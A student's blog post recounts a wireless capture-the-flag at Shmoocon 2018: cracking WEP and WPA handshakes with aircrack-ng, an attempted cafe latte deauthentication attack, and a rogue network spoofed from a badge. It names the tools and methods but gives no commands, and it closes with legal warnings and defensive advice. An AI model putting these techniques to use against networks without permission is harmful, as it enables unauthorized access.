Wireless Hacking, a Beginners Experience at Shmoocon 2018

In the last few weeks, from January 19th to the 21st, I received the opportunity to be Shmoozed at Shmoocon (they let me in for free and gave me $200 cash at the door). The process began by filling out an application and getting a letter of recommendation from a professor. They do this as a way to get college students to attend, and it allows people who are willing to pay more to get a college kid in a ticket for themselves.

One of the most exciting parts of the weekend was the Wireless CTF in the Wireless Village. Shmoocon was the first time that I have ever had exposure to wireless hacking to this level as the learning curve to build a test network is expensive (for a college student) or illegal to do on others without permission (wardriving/warwalking). For context, wardriving/warwalking is the process of driving/walking around an area with a laptop or phone to collect packets from other peoples wifi network. It is highly illegal to do without explicit permission from the network owner(s).

At first, I sought out advice from the organizers. They were very adamant about using an operating system called Pentoo Linux. It is an operating system built off of Gentoo Linux. Linux is, for the most part, a free open source operating system that is developed by an open community. If you have ever used a Macintosh or Apple computer, you have used a derivative of Linux/Unix. Part of the reason that they were so adamant about Pentoo is that one of the organizers of the Wireless village is a developer of the operating system itself. It has many tools preinstalled on it as well as the driver software to work with external wireless devices that are necessary for wireless hacking. For some reason, they did not like people using Kali Linux, which is traditionally the default operating system for security testing. I was able to do all of the work from a live USB drive.

Over the course of the next two days, I was able to progress through three of the challenges, attempt a 4th but could not complete due to hardware limitations, and got tricked into completing a fake challenge (more on this later).

The first challenge completed was to open the powerpoint and submit the given password to the submit server just to see that it was working. Nothing special here, basically free points.

The second challenge involved cracking WEP which stands for "Wired Equivalent Privacy." For some oversimplification, WEP is no longer secure, and it took approximately 1 hour of me collecting packets using airodump-ng. airodump-ng is a packet capture tool similar to Wireshark. It allowed me to capture all data packets flying by in the area. After getting enough Initialization Vectors, I was able to use aircrack-ng along with the supplied password list to get the password. This was all done with the network card on my laptop with no external cards needed. Initialization Vectors are 24bit keys that are used to secure WEP. Given that they are only 24bits long they are often reused which has made it easy to crack.

The third challenge was cracking WPA. WPA stands for Wi-Fi Protected Access. WPA is a more modern more "secure" form of wireless encryption, yes there is WPA2, but this was not the point of this challenge. To crack WPA, I needed to capture the 4-way handshake. To give a little context, I will defer to Wikipedia on this one:

The four-way handshake is designed so that the access point (or authenticator) and wireless client (or supplicant) can independently prove to each other that they know the PSK/PMK, without ever disclosing the key. Instead of disclosing the key, the access point (AP) and client encrypt messages to each other—that can only be decrypted by using the PMK that they already share—and if decryption of the messages was successful, this proves knowledge of the PMK. The four-way handshake is critical for protection of the PMK from malicious access points—for example, an attacker's SSID impersonating a real access point—so that the client never has to tell the access point its PMK.

The PMK is designed to last the entire session and should be exposed as little as possible; therefore, keys to encrypt the traffic need to be derived. A four-way handshake is used to establish another key called the Pairwise Transient Key (PTK). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through a pseudo-random function. The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic.

In the process of connecting to the network, an endpoint device (laptop/cellphone/Xbox/etc.) goes through this handshake process to guarantee that the device has appropriately authenticated to the wireless router. Just by chance, I was able to capture two of these handshakes and again using aricrack-ng and the supplied word list I was able to obtain the password successfully.

The fourth challenge that I was attempting but was not able to complete due to a hardware limitation was an attack that is called a cafe latte attack. The name comes from a de-authentication attack whereby an attacker can send packets that will cause an already connected device (i.e., someone else's laptop or phone) to disconnect from the network, which will cause them to authenticate to the network. It is supposed to be completed within the time that it would take an attacker to finish a latte at a cafe.

The Cafe Latte attack allows you to obtain a WEP key from a client system. Briefly, this is done by capturing an ARP packet from the client, manipulating it and then send it back to the client. The client, in turn, generates packets which can be captured by airodump-ng. Subsequently, aircrack-ng can be used to determine the WEP key.

The physical limitation that I had with this is that at the time I did not have an external network card. As such I could not send a de-authentication packet to the router while simultaneously sniffing the network. Generally in Wireless hacking people will use several cards. One network card for sniffing packets (just grabbing them out of the air as they fly by), a second for packet injection/attacks, another card if they are sniffing/working on a 5Ghz network (most wireless network attack challenges happened on the 2.4Ghz band), and lastly, if they are going for the challenge an RTL-SDR or HackRF. 

These last two devices are software defined radios. Basically, it is a special USB device that can listen in on a wide range of the radio frequency spectrum. So with this, it can listen on many different frequencies such as AM radio, FM radio, security systems, Wifi, Pagers, cell phones, Bluetooth, Z-wave (home Internet of things protocol), Zigbee (home Internet of things protocol), etc. Again there is a hardware limitation that you need one of these devices to participate in these challenges at all. The RTL-SDR is the cheap $20 one that can be bought on Amazon, but it only can receive and not the ability to transmit. The HackOneRf is a lot more expensive at around $300 or more. It can transmit and can do a bit more fun stuff. 

The last challenge that I attempted turned out not even to be a challenge at all, well at least it did not get me any points. At the very beginning of the wireless CTF, they do a baseline so to speak where they let all participants check all of the networks. When baselining a person wants to know from a given spot, what the BSSID's are. These are names of the wireless network. The MAC address of each device. The Mac address is a globally unique identifier that is also sometimes called a physical address. They look something like this 01-23-45-67-89-ab. They are not the same as IP addresses. IP addresses are dynamically allocated within a traditional network whereas MAC addresses are physically written on network interface cards. Another thing to benchmark is the signal strength as it should not fluctuate beyond a certain point so long as neither device moves, i.e., you sit in the same chair for each day of the challenge. 

During the last day of the challenge, there were two wireless networks with the same BSSID something along the lines of "Network_10" and "Network_10". Both of them happened to have the same MAC address. They had varying signal strengths. One was using WEP encryption, and the other was using WPA encryption. Being naive and never doing this before, part of me thought that this was some part of the challenge. As it turns out it was not a challenge, at least for me. I started with the WEP one and hammered away at it. I finally got the password as the string "Incorrect." I thought maybe this is a little weird, but whatever I followed the same process as a similar challenge as before. When I submitted the password to the submit server it came back the solution was incorrect, and I received no points.

At the end of the wireless CTF, it was revealed that one person was spoofing that network. It was a rather clever trick. To back peddle a little bit. At Shmoocon, we were each given a rocket-shaped circuit board on a lanyard as a badge. When I took the plastic casing off, I discovered three things. The first being a micro USB port, the second a USB serial module and lastly a wireless network card. As it turns out all of the boards were using an Arduino controller. Arduino's are small single process computers that are used for developing little hardware circuits. I had some small experience with these when I developed a 'truly' random number generator that reads the decay of uranium ore that I bought off Amazon. This came from a joke of an early teacher, shout out to Evan Golub, who never expected his students to take his jokes seriously about putting uranium in a computer. Anyways, the Computer Science department does not offer courses using Arduino devices. This explanation will be in a forthcoming article.

The other participant had reverse engineered their Sshmoocon badge to spoof an easily crackable WEP "secured" network that I unknowingly cracked correctly, but did not earn myself any points. The Wireless Village liked his trick, and so he received points anytime someone submitted his flag. Thinking that I misspelled "Incorrect", I submitted it twice and got him double points.

Overall it was a great experience to play in the wirelessCTF. I have spent more time learning wifi cracking using the Packet Capture files (PCAP files) I collected with their permission at the conference. 

Just a reminder as always this article is for educational purposes only. Don't break the law. I am not responsible for anyone that goes to jail because of this. I am still in college and will not post your bail. Hacking laws in the US are very ill-defined or well defined, depending on the way that you look at them. Even connecting to an open network is technically a felony and could land you 20 years in prison.

No solutions to the real challenges were posted in this article because the wireless CTF is going to be rerun at BSidesCharm this April.

Addendum:

After participating in the Wireless CTF, there are some simple things that we can do to protect ourselves. Whether we are on public wifi or our own network, using a VPN is highly recommended as it can help prevent eavesdropping and adds a layer of encryption over your data. Despite WPA2 being the go-to standard as of this writing, there was a recent vulnerability where it could be cracked. That being said it is still essential that on your own home wifi that you employ WPA2, (WPA3 when it comes out) and use strong, secure passwords.